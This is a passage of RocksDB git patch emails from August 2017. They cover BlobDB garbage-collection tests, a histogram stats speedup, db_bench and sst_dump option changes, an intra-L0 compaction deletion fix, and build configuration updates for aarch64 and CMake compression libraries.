blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + mock_env_->set_now_micros(300 * 1000000); + + SyncPoint::GetInstance()->LoadDependency( + {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetForUpdate", + "BlobDBImpl::PutUntil:Start"}, + {"BlobDBImpl::PutUntil:Finish", + "BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"}}); + SyncPoint::GetInstance()->EnableProcessing(); + + auto writer = port::Thread([this]() { + ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v2", 400)); + }); + + GCStats gc_stats; + ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(1, gc_stats.blob_count); + ASSERT_EQ(1, gc_stats.num_deletes); + ASSERT_EQ(0, gc_stats.delete_succeeded); + ASSERT_EQ(1, gc_stats.overwritten_while_delete); + ASSERT_EQ(0, gc_stats.num_relocate); + writer.join(); + VerifyDB({{"foo", "v2"}}); +} + } // namespace blob_db } // namespace rocksdb diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc index 3931c8669b2..75afab2e743 100644 --- a/utilities/blob_db/blob_log_reader.cc +++ b/utilities/blob_db/blob_log_reader.cc @@ -41,7 +41,7 @@ Status Reader::ReadHeader(BlobLogHeader* header) { } Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, - WALRecoveryMode wal_recovery_mode) { + uint64_t* blob_offset) { record->Clear(); buffer_.clear(); 
backing_store_[0] = '\0'; @@ -65,6 +65,9 @@ Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, header_crc = crc32c::Extend(header_crc, buffer_.data(), crc_data_size); uint64_t kb_size = record->GetKeySize() + record->GetBlobSize(); + if (blob_offset != nullptr) { + *blob_offset = next_byte_ + record->GetKeySize(); + } switch (level) { case kReadHdrFooter: file_->Skip(kb_size); diff --git a/utilities/blob_db/blob_log_reader.h b/utilities/blob_db/blob_log_reader.h index 05f53fe93f7..5522ec3a28b 100644 --- a/utilities/blob_db/blob_log_reader.h +++ b/utilities/blob_db/blob_log_reader.h @@ -60,9 +60,9 @@ class Reader { // "*scratch" as temporary storage. The contents filled in *record // will only be valid until the next mutating operation on this // reader or the next mutation to *scratch. + // If blob_offset is non-null, return offset of the blob through it. Status ReadRecord(BlobLogRecord* record, ReadLevel level = kReadHdrFooter, - WALRecoveryMode wal_recovery_mode = - WALRecoveryMode::kTolerateCorruptedTailRecords); + uint64_t* blob_offset = nullptr); SequentialFileReader* file() { return file_.get(); } From 3f5888430a537c0580d9ee863152c98a3f46d546 Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Fri, 11 Aug 2017 12:56:26 -0700 Subject: [PATCH 101/205] Fix c_test ASAN failure Summary: Fix c_test missing deletion of write batch pointer. Closes https://github.com/facebook/rocksdb/pull/2725 Differential Revision: D5613866 Pulled By: yiwu-arbug fbshipit-source-id: bf3f59a6812178577c9c25bae558ef36414a1f51 --- db/c_test.c | 1 + 1 file changed, 1 insertion(+) diff --git a/db/c_test.c b/db/c_test.c index 95d27360748..7b76badf1ce 100644 --- a/db/c_test.c +++ b/db/c_test.c @@ -1387,6 +1387,7 @@ int main(int argc, char** argv) { rocksdb_writebatch_put(wb, "box", 3, "c", 1); rocksdb_writebatch_delete(wb, "bar", 3); rocksdb_transactiondb_write(txn_db, woptions, wb, &err); + rocksdb_writebatch_destroy(wb); CheckTxnDBGet(txn_db, roptions, "box", "c"); CheckNoError(err); From 5de98f2d50fec1b5b88a973e825b1156fb03a943 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 11 Aug 2017 13:09:38 -0700 Subject: [PATCH 102/205] approximate histogram stats to save cpu Summary: sounds like we're willing to tradeoff minor inaccuracy in stats for speed. start with histogram stats. ticker stats will be harder (and, IMO, we shouldn't change them in this manner) as many test cases rely on them being exactly correct. Closes https://github.com/facebook/rocksdb/pull/2720 Differential Revision: D5607884 Pulled By: ajkr fbshipit-source-id: 1b754cda35ea6b252d1fdd5aa3cfb58866506372 --- monitoring/histogram.cc | 21 +++++++++++++++------ 1 file changed, 15 insertions(+), 6 deletions(-) diff --git a/monitoring/histogram.cc b/monitoring/histogram.cc index 56b5a3914a1..083ef75fdf4 100644 --- a/monitoring/histogram.cc +++ b/monitoring/histogram.cc @@ -105,17 +105,26 @@ void HistogramStat::Add(uint64_t value) { // by concurrent threads is tolerable. 
   const size_t index = bucketMapper.IndexForValue(value);
   assert(index < num_buckets_);
-  buckets_[index].fetch_add(1, std::memory_order_relaxed);
+  buckets_[index].store(buckets_[index].load(std::memory_order_relaxed) + 1,
+                        std::memory_order_relaxed);
 
   uint64_t old_min = min();
-  while (value < old_min && !min_.compare_exchange_weak(old_min, value)) {}
+  if (value < old_min) {
+    min_.store(value, std::memory_order_relaxed);
+  }
 
   uint64_t old_max = max();
-  while (value > old_max && !max_.compare_exchange_weak(old_max, value)) {}
+  if (value > old_max) {
+    max_.store(value, std::memory_order_relaxed);
+  }
 
-  num_.fetch_add(1, std::memory_order_relaxed);
-  sum_.fetch_add(value, std::memory_order_relaxed);
-  sum_squares_.fetch_add(value * value, std::memory_order_relaxed);
+  num_.store(num_.load(std::memory_order_relaxed) + 1,
+             std::memory_order_relaxed);
+  sum_.store(sum_.load(std::memory_order_relaxed) + value,
+             std::memory_order_relaxed);
+  sum_squares_.store(
+      sum_squares_.load(std::memory_order_relaxed) + value * value,
+      std::memory_order_relaxed);
 }
 
 void HistogramStat::Merge(const HistogramStat& other) {

From 74f18c13019cb367bdafef4ee7c618d02d62c08d Mon Sep 17 00:00:00 2001
From: Andrew Kryczka
Date: Fri, 11 Aug 2017 13:46:41 -0700
Subject: [PATCH 103/205] db_bench support for non-uniform column family ops

Summary:
Previously we could only select the CF on which to operate uniformly at random. This is a limitation, e.g., when testing universal compaction as all CFs would need to run full compaction at roughly the same time, which isn't realistic.

This PR allows the user to specify the probability distribution for selecting CFs via the `--column_family_distribution` argument.
Closes https://github.com/facebook/rocksdb/pull/2677

Differential Revision: D5544436

Pulled By: ajkr

fbshipit-source-id: 478d56260995236ae90895ce5bd51f38882e185a
---
 tools/db_bench_tool.cc | 52 ++++++++++++++++++++++++++++++++++++++++--
 1 file changed, 50 insertions(+), 2 deletions(-)

diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc
index 6f12390af70..0f89095434d 100644
--- a/tools/db_bench_tool.cc
+++ b/tools/db_bench_tool.cc
@@ -206,6 +206,15 @@ DEFINE_int32(
     "create new set of column families and insert to them. Only used "
     "when num_column_families > 1.");
 
+DEFINE_string(column_family_distribution, "",
+              "Comma-separated list of percentages, where the ith element "
+              "indicates the probability of an op using the ith column family. "
+              "The number of elements must be `num_hot_column_families` if "
+              "specified; otherwise, it must be `num_column_families`. The "
+              "sum of elements must be 100. E.g., if `num_column_families=4`, "
+              "and `num_hot_column_families=0`, a valid list could be "
+              "\"10,20,30,40\".");
+
 DEFINE_int64(reads, -1, "Number of read operations to do. "
              "If negative, do FLAGS_num reads.");
 
@@ -1198,6 +1207,8 @@ struct DBWithColumnFamilies {
   // After each CreateNewCf(), another num_hot number of new
   // Column families will be created and used to be queried.
   port::Mutex create_cf_mutex;  // Only one thread can execute CreateNewCf()
+  std::vector<int> cfh_idx_to_prob;  // ith index holds probability of operating
+                                     // on cfh[i].
DBWithColumnFamilies() : db(nullptr) @@ -1217,7 +1228,9 @@ struct DBWithColumnFamilies { opt_txn_db(other.opt_txn_db), #endif // ROCKSDB_LITE num_created(other.num_created.load()), - num_hot(other.num_hot) {} + num_hot(other.num_hot), + cfh_idx_to_prob(other.cfh_idx_to_prob) { + } void DeleteDBs() { std::for_each(cfh.begin(), cfh.end(), @@ -1239,8 +1252,20 @@ struct DBWithColumnFamilies { ColumnFamilyHandle* GetCfh(int64_t rand_num) { assert(num_hot > 0); + size_t rand_offset = 0; + if (!cfh_idx_to_prob.empty()) { + assert(cfh_idx_to_prob.size() == num_hot); + int sum = 0; + while (sum + cfh_idx_to_prob[rand_offset] < rand_num % 100) { + sum += cfh_idx_to_prob[rand_offset]; + ++rand_offset; + } + assert(rand_offset < cfh_idx_to_prob.size()); + } else { + rand_offset = rand_num % num_hot; + } return cfh[num_created.load(std::memory_order_acquire) - num_hot + - rand_num % num_hot]; + rand_offset]; } // stage: assume CF from 0 to stage * num_hot has be created. Need to create @@ -3275,6 +3300,28 @@ void VerifyDBFromDB(std::string& truth_db_name) { column_families.push_back(ColumnFamilyDescriptor( ColumnFamilyName(i), ColumnFamilyOptions(options))); } + std::vector cfh_idx_to_prob; + if (!FLAGS_column_family_distribution.empty()) { + std::stringstream cf_prob_stream(FLAGS_column_family_distribution); + std::string cf_prob; + int sum = 0; + while (std::getline(cf_prob_stream, cf_prob, ',')) { + cfh_idx_to_prob.push_back(std::stoi(cf_prob)); + sum += cfh_idx_to_prob.back(); + } + if (sum != 100) { + fprintf(stderr, "column_family_distribution items must sum to 100\n"); + exit(1); + } + if (cfh_idx_to_prob.size() != num_hot) { + fprintf(stderr, + "got %" ROCKSDB_PRIszt + " column_family_distribution items; expected " + "%" ROCKSDB_PRIszt "\n", + cfh_idx_to_prob.size(), num_hot); + exit(1); + } + } #ifndef ROCKSDB_LITE if (FLAGS_readonly) { s = DB::OpenForReadOnly(options, db_name, column_families, @@ -3302,6 +3349,7 @@ void VerifyDBFromDB(std::string& truth_db_name) { db->cfh.resize(FLAGS_num_column_families); db->num_created = num_hot; db->num_hot = num_hot; + db->cfh_idx_to_prob = std::move(cfh_idx_to_prob); #ifndef ROCKSDB_LITE } else if (FLAGS_readonly) { s = DB::OpenForReadOnly(options, db_name, &db->db); From 8254e9b57c801498f285c5135f5cea7581c63d08 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 11 Aug 2017 15:49:17 -0700 Subject: [PATCH 104/205] make sst_dump compression size command consistent Summary: - like other subcommands, reporting compression sizes should be specified with the `--command` CLI arg. - also added `--compression_types` arg as it's useful to restrict the types of compression used, at least in my dictionary compression experiments. 
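For illustration, a hypothetical invocation using the reworked flags (the file path here is invented; the flags are the ones added in this diff) might be:

    sst_dump --file=/path/to/table.sst --command=recompress \
        --set_block_size=16384 --compression_types=kSnappyCompression,kZSTD

If `--compression_types` is omitted, every supported compression type is tried; if `--set_block_size` is omitted, the default 16384-byte block size is used.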
Closes https://github.com/facebook/rocksdb/pull/2706 Differential Revision: D5589520 Pulled By: ajkr fbshipit-source-id: 305bb4ebcc95eecc8a85523cd3b1050619c9ddc5 --- tools/sst_dump_test.cc | 2 +- tools/sst_dump_tool.cc | 81 ++++++++++++++++++++++++--------------- tools/sst_dump_tool_imp.h | 5 ++- 3 files changed, 56 insertions(+), 32 deletions(-) diff --git a/tools/sst_dump_test.cc b/tools/sst_dump_test.cc index 0a222afa33a..460b5a2cc17 100644 --- a/tools/sst_dump_test.cc +++ b/tools/sst_dump_test.cc @@ -195,7 +195,7 @@ TEST_F(SSTDumpToolTest, CompressedSizes) { } snprintf(usage[0], optLength, "./sst_dump"); - snprintf(usage[1], optLength, "--show_compression_sizes"); + snprintf(usage[1], optLength, "--command=recompress"); snprintf(usage[2], optLength, "--file=rocksdb_sst_test.sst"); rocksdb::SSTDumpTool tool; ASSERT_TRUE(!tool.Run(3, usage)); diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index fa89e6cdd6a..4dca284cceb 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -60,6 +60,17 @@ extern const uint64_t kLegacyPlainTableMagicNumber; const char* testFileName = "test_file_name"; +static const std::vector> + kCompressions = { + {CompressionType::kNoCompression, "kNoCompression"}, + {CompressionType::kSnappyCompression, "kSnappyCompression"}, + {CompressionType::kZlibCompression, "kZlibCompression"}, + {CompressionType::kBZip2Compression, "kBZip2Compression"}, + {CompressionType::kLZ4Compression, "kLZ4Compression"}, + {CompressionType::kLZ4HCCompression, "kLZ4HCCompression"}, + {CompressionType::kXpressCompression, "kXpressCompression"}, + {CompressionType::kZSTD, "kZSTD"}}; + Status SstFileReader::GetTableReader(const std::string& file_path) { // Warning about 'magic_number' being uninitialized shows up only in UBsan // builds. 
Though access is guarded by 's.ok()' checks, fix the issue to @@ -174,7 +185,10 @@ uint64_t SstFileReader::CalculateCompressedTableSize( return size; } -int SstFileReader::ShowAllCompressionSizes(size_t block_size) { +int SstFileReader::ShowAllCompressionSizes( + size_t block_size, + const std::vector>& + compression_types) { ReadOptions read_options; Options opts; const ImmutableCFOptions imoptions(opts); @@ -184,17 +198,7 @@ int SstFileReader::ShowAllCompressionSizes(size_t block_size) { fprintf(stdout, "Block Size: %" ROCKSDB_PRIszt "\n", block_size); - std::pair compressions[] = { - {CompressionType::kNoCompression, "kNoCompression"}, - {CompressionType::kSnappyCompression, "kSnappyCompression"}, - {CompressionType::kZlibCompression, "kZlibCompression"}, - {CompressionType::kBZip2Compression, "kBZip2Compression"}, - {CompressionType::kLZ4Compression, "kLZ4Compression"}, - {CompressionType::kLZ4HCCompression, "kLZ4HCCompression"}, - {CompressionType::kXpressCompression, "kXpressCompression"}, - {CompressionType::kZSTD, "kZSTD"}}; - - for (auto& i : compressions) { + for (auto& i : compression_types) { if (CompressionTypeSupported(i.first)) { CompressionOptions compress_opt; std::string column_family_name; @@ -359,6 +363,8 @@ void print_help() { scan: Iterate over entries in files and print them to screen raw: Dump all the table contents to _dump.txt verify: Iterate all the blocks in files verifying checksum to detect possible coruption but dont print anything except if a corruption is encountered + recompress: reports the SST file size if recompressed with different + compression types --output_hex Can be combined with scan command to print the keys and values in Hex @@ -383,15 +389,17 @@ void print_help() { Can be combined with --from and --to to indicate that these values are encoded in Hex --show_properties - Print table properties after iterating over the file - - --show_compression_sizes - Independent command that will recreate the SST file using 16K block size with different - compressions and report the size of the file using such compression + Print table properties after iterating over the file when executing + check|scan|raw --set_block_size= - Can be combined with --show_compression_sizes to set the block size that will be used - when trying different compression algorithms + Can be combined with --command=recompress to set the block size that will + be used when trying different compression algorithms + + --compression_types= + Can be combined with --command=recompress to run recompression for this + list of compression types --parse_internal_key=<0xKEY> Convenience option to parse an internal key on the command line. 
Dumps the @@ -415,13 +423,13 @@ int SSTDumpTool::Run(int argc, char** argv) { bool has_to = false; bool use_from_as_prefix = false; bool show_properties = false; - bool show_compression_sizes = false; bool show_summary = false; bool set_block_size = false; std::string from_key; std::string to_key; std::string block_size_str; size_t block_size; + std::vector> compression_types; uint64_t total_num_files = 0; uint64_t total_num_data_blocks = 0; uint64_t total_data_block_size = 0; @@ -453,19 +461,34 @@ int SSTDumpTool::Run(int argc, char** argv) { use_from_as_prefix = true; } else if (strcmp(argv[i], "--show_properties") == 0) { show_properties = true; - } else if (strcmp(argv[i], "--show_compression_sizes") == 0) { - show_compression_sizes = true; } else if (strcmp(argv[i], "--show_summary") == 0) { show_summary = true; } else if (strncmp(argv[i], "--set_block_size=", 17) == 0) { set_block_size = true; block_size_str = argv[i] + 17; std::istringstream iss(block_size_str); + iss >> block_size; if (iss.fail()) { - fprintf(stderr, "block size must be numeric"); + fprintf(stderr, "block size must be numeric\n"); exit(1); } - iss >> block_size; + } else if (strncmp(argv[i], "--compression_types=", 20) == 0) { + std::string compression_types_csv = argv[i] + 20; + std::istringstream iss(compression_types_csv); + std::string compression_type; + while (std::getline(iss, compression_type, ',')) { + auto iter = std::find_if( + kCompressions.begin(), kCompressions.end(), + [&compression_type](std::pair curr) { + return curr.second == compression_type; + }); + if (iter == kCompressions.end()) { + fprintf(stderr, "%s is not a valid CompressionType\n", + compression_type.c_str()); + exit(1); + } + compression_types.emplace_back(*iter); + } } else if (strncmp(argv[i], "--parse_internal_key=", 21) == 0) { std::string in_key(argv[i] + 21); try { @@ -547,12 +570,10 @@ int SSTDumpTool::Run(int argc, char** argv) { continue; } - if (show_compression_sizes) { - if (set_block_size) { - reader.ShowAllCompressionSizes(block_size); - } else { - reader.ShowAllCompressionSizes(16384); - } + if (command == "recompress") { + reader.ShowAllCompressionSizes( + set_block_size ? block_size : 16384, + compression_types.empty() ? kCompressions : compression_types); return 0; } diff --git a/tools/sst_dump_tool_imp.h b/tools/sst_dump_tool_imp.h index e2b6396071c..9531b5415bd 100644 --- a/tools/sst_dump_tool_imp.h +++ b/tools/sst_dump_tool_imp.h @@ -34,7 +34,10 @@ class SstFileReader { Status DumpTable(const std::string& out_filename); Status getStatus() { return init_result_; } - int ShowAllCompressionSizes(size_t block_size); + int ShowAllCompressionSizes( + size_t block_size, + const std::vector>& + compression_types); private: // Get the TableReader implementation for the sst file From acf935e40f9d6f4c3d13c7d310def7064c1f1c95 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Fri, 11 Aug 2017 18:01:28 -0700 Subject: [PATCH 105/205] fix deletion dropping in intra-L0 Summary: `KeyNotExistsBeyondOutputLevel` didn't consider L0 files' key-ranges. So if a key only was covered by older L0 files' key-ranges, we would incorrectly drop deletions of that key. This PR just skips the deletion-dropping optimization when output level is L0. 
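Concretely (a made-up sequence, not taken from the patch): suppose an older L0 file contains `Put("a", "v1")`, a newer L0 file contains `Delete("a")`, and no file in L1 or below covers key `"a"`. An intra-L0 compaction that includes only the newer file asks `KeyNotExistsBeyondOutputLevel()`, which scans only levels strictly beyond the output level (L1 and deeper) and never the other L0 files; it concludes `"a"` exists nowhere else, drops the tombstone, and later reads resurrect `"a" -> "v1"` from the older L0 file.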
Closes https://github.com/facebook/rocksdb/pull/2726 Differential Revision: D5617286 Pulled By: ajkr fbshipit-source-id: 4bff1396b06d49a828ba4542f249191052915bce --- HISTORY.md | 1 + db/compaction.cc | 4 +++ db/db_compaction_test.cc | 73 +++++++++++++++++++++++++++++++++++----- 3 files changed, 70 insertions(+), 8 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 7c71fdd1687..29f0f3f2701 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -7,6 +7,7 @@ ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`. +* Fix incorrect dropping of deletions during intra-L0 compaction. ## 5.7.0 (07/13/2017) ### Public API Change diff --git a/db/compaction.cc b/db/compaction.cc index 31adcc29de4..9ea332da3fd 100644 --- a/db/compaction.cc +++ b/db/compaction.cc @@ -288,6 +288,10 @@ bool Compaction::KeyNotExistsBeyondOutputLevel( if (cfd_->ioptions()->compaction_style == kCompactionStyleUniversal) { return bottommost_level_; } + if (cfd_->ioptions()->compaction_style == kCompactionStyleLevel && + output_level_ == 0) { + return false; + } // Maybe use binary search to find right entry instead of linear search? const Comparator* user_cmp = cfd_->user_comparator(); for (int lvl = output_level_ + 1; lvl < number_levels_; lvl++) { diff --git a/db/db_compaction_test.cc b/db/db_compaction_test.cc index 4c7da8d1b50..bca188a9832 100644 --- a/db/db_compaction_test.cc +++ b/db/db_compaction_test.cc @@ -2602,13 +2602,11 @@ TEST_P(DBCompactionTestWithParam, IntraL0Compaction) { // Files 6-9 are the longest span of available files for which // work-per-deleted-file decreases (see "score" row above). for (int i = 0; i < 10; ++i) { - for (int j = 0; j < 2; ++j) { - ASSERT_OK(Put(Key(0), "")); // prevents trivial move - if (i == 5) { - ASSERT_OK(Put(Key(i + 1), value + value)); - } else { - ASSERT_OK(Put(Key(i + 1), value)); - } + ASSERT_OK(Put(Key(0), "")); // prevents trivial move + if (i == 5) { + ASSERT_OK(Put(Key(i + 1), value + value)); + } else { + ASSERT_OK(Put(Key(i + 1), value)); } ASSERT_OK(Flush()); } @@ -2623,10 +2621,69 @@ TEST_P(DBCompactionTestWithParam, IntraL0Compaction) { ASSERT_EQ(2, level_to_files[0].size()); ASSERT_GT(level_to_files[1].size(), 0); for (int i = 0; i < 2; ++i) { - ASSERT_GE(level_to_files[0][0].fd.file_size, 1 << 21); + ASSERT_GE(level_to_files[0][i].fd.file_size, 1 << 21); } } +TEST_P(DBCompactionTestWithParam, IntraL0CompactionDoesNotObsoleteDeletions) { + // regression test for issue #2722: L0->L0 compaction can resurrect deleted + // keys from older L0 files if L1+ files' key-ranges do not include the key. + Options options = CurrentOptions(); + options.compression = kNoCompression; + options.level0_file_num_compaction_trigger = 5; + options.max_background_compactions = 2; + options.max_subcompactions = max_subcompactions_; + DestroyAndReopen(options); + + const size_t kValueSize = 1 << 20; + Random rnd(301); + std::string value(RandomString(&rnd, kValueSize)); + + rocksdb::SyncPoint::GetInstance()->LoadDependency( + {{"LevelCompactionPicker::PickCompactionBySize:0", + "CompactionJob::Run():Start"}}); + rocksdb::SyncPoint::GetInstance()->EnableProcessing(); + + // index: 0 1 2 3 4 5 6 7 8 9 + // size: 1MB 1MB 1MB 1MB 1MB 1MB 1MB 1MB 1MB 1MB + // score: 1.25 1.33 1.5 2.0 inf + // + // Files 0-4 will be included in an L0->L1 compaction. + // + // L0->L0 will be triggered since the sync points guarantee compaction to base + // level is still blocked when files 5-9 trigger another compaction. 
All files + // 5-9 are included in the L0->L0 due to work-per-deleted file decreasing. + // + // Put a key-value in files 0-4. Delete that key in files 5-9. Verify the + // L0->L0 preserves the deletion such that the key remains deleted. + for (int i = 0; i < 10; ++i) { + // key 0 serves both to prevent trivial move and as the key we want to + // verify is not resurrected by L0->L0 compaction. + if (i < 5) { + ASSERT_OK(Put(Key(0), "")); + } else { + ASSERT_OK(Delete(Key(0))); + } + ASSERT_OK(Put(Key(i + 1), value)); + ASSERT_OK(Flush()); + } + dbfull()->TEST_WaitForCompact(); + rocksdb::SyncPoint::GetInstance()->DisableProcessing(); + + std::vector> level_to_files; + dbfull()->TEST_GetFilesMetaData(dbfull()->DefaultColumnFamily(), + &level_to_files); + ASSERT_GE(level_to_files.size(), 2); // at least L0 and L1 + // L0 has a single output file from L0->L0 + ASSERT_EQ(1, level_to_files[0].size()); + ASSERT_GT(level_to_files[1].size(), 0); + ASSERT_GE(level_to_files[0][0].fd.file_size, 1 << 22); + + ReadOptions roptions; + std::string result; + ASSERT_TRUE(db_->Get(roptions, Key(0), &result).IsNotFound()); +} + INSTANTIATE_TEST_CASE_P(DBCompactionTestWithParam, DBCompactionTestWithParam, ::testing::Values(std::make_tuple(1, true), std::make_tuple(1, false), From a144a9782d5929ecc22b5b41876859514c22c0aa Mon Sep 17 00:00:00 2001 From: Adam Retter Date: Sat, 12 Aug 2017 16:26:56 -0700 Subject: [PATCH 106/205] Fix for CMakeLists.txt on Windows for RocksJava Summary: Closes https://github.com/facebook/rocksdb/pull/2730 Differential Revision: D5619256 Pulled By: ajkr fbshipit-source-id: c80d697eeceab91964259132e58f5cd2219efb93 --- java/CMakeLists.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/java/CMakeLists.txt b/java/CMakeLists.txt index a34cda6ca85..d67896c2cd8 100644 --- a/java/CMakeLists.txt +++ b/java/CMakeLists.txt @@ -77,6 +77,7 @@ set(NATIVE_JAVA_CLASSES org.rocksdb.FlushOptions org.rocksdb.HashLinkedListMemTableConfig org.rocksdb.HashSkipListMemTableConfig + org.rocksdb.IngestExternalFileOptions org.rocksdb.Logger org.rocksdb.LRUCache org.rocksdb.MemTableConfig From 5449c0990b32ac0fcc69faeed9bada5ff1fa4a8a Mon Sep 17 00:00:00 2001 From: Andrew Gallagher Date: Sun, 13 Aug 2017 17:04:19 -0700 Subject: [PATCH 107/205] rocksdb: make buildable on aarch64 Summary: - Remove default arch-specified flags. - Move non-default arch-specific flags to arch-specific param. 
Reviewed By: yiwu-arbug Differential Revision: D5597499 fbshipit-source-id: c53108ac39c73ac36893d3fd9aaf3b5e3080f1ae --- TARGETS | 10 +++++++++- buckifier/targets_cfg.py | 11 ++++++++--- 2 files changed, 17 insertions(+), 4 deletions(-) diff --git a/TARGETS b/TARGETS index dcf2729e7bd..3fac4a73785 100644 --- a/TARGETS +++ b/TARGETS @@ -14,7 +14,6 @@ rocksdb_compiler_flags = [ "-DROCKSDB_RANGESYNC_PRESENT", "-DROCKSDB_SCHED_GETCPU_PRESENT", "-DROCKSDB_SUPPORT_THREAD_LOCAL", - "-DHAVE_SSE42", "-DOS_LINUX", "-DROCKSDB_UBSAN_RUN", # Flags to enable libs we include @@ -48,6 +47,10 @@ rocksdb_preprocessor_flags = [ "-I" + REPO_PATH, ] +rocksdb_arch_preprocessor_flags = { + "x86_64": ["-DHAVE_SSE42"], +} + cpp_library( name = "rocksdb_lib", headers = AutoHeaders.RECURSIVE_GLOB, @@ -263,6 +266,7 @@ cpp_library( ], deps = [], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -283,6 +287,7 @@ cpp_library( ], deps = [":rocksdb_lib"], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -296,6 +301,7 @@ cpp_library( ], deps = [":rocksdb_lib"], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -306,6 +312,7 @@ cpp_library( srcs = ["env/env_basic_test.cc"], deps = [":rocksdb_test_lib"], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -501,6 +508,7 @@ for test_cfg in ROCKS_TESTS: srcs = [test_cc], deps = [":rocksdb_test_lib"], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) diff --git a/buckifier/targets_cfg.py b/buckifier/targets_cfg.py index edc0e84556c..33023a589f4 100644 --- a/buckifier/targets_cfg.py +++ b/buckifier/targets_cfg.py @@ -6,7 +6,7 @@ import os TARGETS_PATH = os.path.dirname(__file__) -REPO_PATH = TARGETS_PATH[(TARGETS_PATH.find('fbcode/') + len('fbcode/')):] + "/" +REPO_PATH = "rocksdb/src/" BUCK_BINS = "buck-out/gen/" + REPO_PATH TEST_RUNNER = REPO_PATH + "buckifier/rocks_test_runner.sh" rocksdb_compiler_flags = [ @@ -18,9 +18,7 @@ "-DROCKSDB_RANGESYNC_PRESENT", "-DROCKSDB_SCHED_GETCPU_PRESENT", "-DROCKSDB_SUPPORT_THREAD_LOCAL", - "-DHAVE_SSE42", "-DOS_LINUX", - "-DROCKSDB_UBSAN_RUN", # Flags to enable libs we include "-DSNAPPY", "-DZLIB", @@ -51,6 +49,10 @@ "-I" + REPO_PATH + "include/", "-I" + REPO_PATH, ] + +rocksdb_arch_preprocessor_flags = { + "x86_64": ["-DHAVE_SSE42"], +} """ @@ -61,6 +63,7 @@ srcs = [%s], deps = [%s], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -72,6 +75,7 @@ srcs = [%s], deps = [%s], preprocessor_flags = rocksdb_preprocessor_flags, + arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) @@ -94,6 +98,7 @@ srcs = [test_cc], deps = [":rocksdb_test_lib"], preprocessor_flags = rocksdb_preprocessor_flags, + 
arch_preprocessor_flags = rocksdb_arch_preprocessor_flags, compiler_flags = rocksdb_compiler_flags, external_deps = rocksdb_external_deps, ) From 185ade4c0c91288ae268f6ceca8310421325cea4 Mon Sep 17 00:00:00 2001 From: Jay Date: Sun, 13 Aug 2017 21:29:53 -0700 Subject: [PATCH 108/205] cmake: support more compression type Summary: This pr enables linking all the supported compression libraries via cmake. Closes https://github.com/facebook/rocksdb/pull/2552 Differential Revision: D5620607 Pulled By: yiwu-arbug fbshipit-source-id: b6949181f305bfdf04a98f898c92fd0caba0c45a --- CMakeLists.txt | 33 +++++++++++++++++++++++++++++++++ cmake/modules/Findbzip2.cmake | 21 +++++++++++++++++++++ cmake/modules/Findlz4.cmake | 21 +++++++++++++++++++++ cmake/modules/Findzlib.cmake | 21 +++++++++++++++++++++ cmake/modules/Findzstd.cmake | 21 +++++++++++++++++++++ 5 files changed, 117 insertions(+) create mode 100644 cmake/modules/Findbzip2.cmake create mode 100644 cmake/modules/Findlz4.cmake create mode 100644 cmake/modules/Findzlib.cmake create mode 100644 cmake/modules/Findzstd.cmake diff --git a/CMakeLists.txt b/CMakeLists.txt index b4b568b74be..36c9ff20e82 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -56,6 +56,7 @@ else() include_directories(${JEMALLOC_INCLUDE_DIR}) endif() endif() + option(WITH_SNAPPY "build with SNAPPY" OFF) if(WITH_SNAPPY) find_package(snappy REQUIRED) @@ -63,6 +64,38 @@ else() include_directories(${SNAPPY_INCLUDE_DIR}) list(APPEND THIRDPARTY_LIBS ${SNAPPY_LIBRARIES}) endif() + + option(WITH_ZLIB "build with zlib" OFF) + if(WITH_ZLIB) + find_package(zlib REQUIRED) + add_definitions(-DZLIB) + include_directories(${ZLIB_INCLUDE_DIR}) + list(APPEND THIRDPARTY_LIBS ${ZLIB_LIBRARIES}) + endif() + + option(WITH_BZ2 "build with bzip2" OFF) + if(WITH_BZ2) + find_package(bzip2 REQUIRED) + add_definitions(-DBZIP2) + include_directories(${BZIP2_INCLUDE_DIR}) + list(APPEND THIRDPARTY_LIBS ${BZIP2_LIBRARIES}) + endif() + + option(WITH_LZ4 "build with lz4" OFF) + if(WITH_LZ4) + find_package(lz4 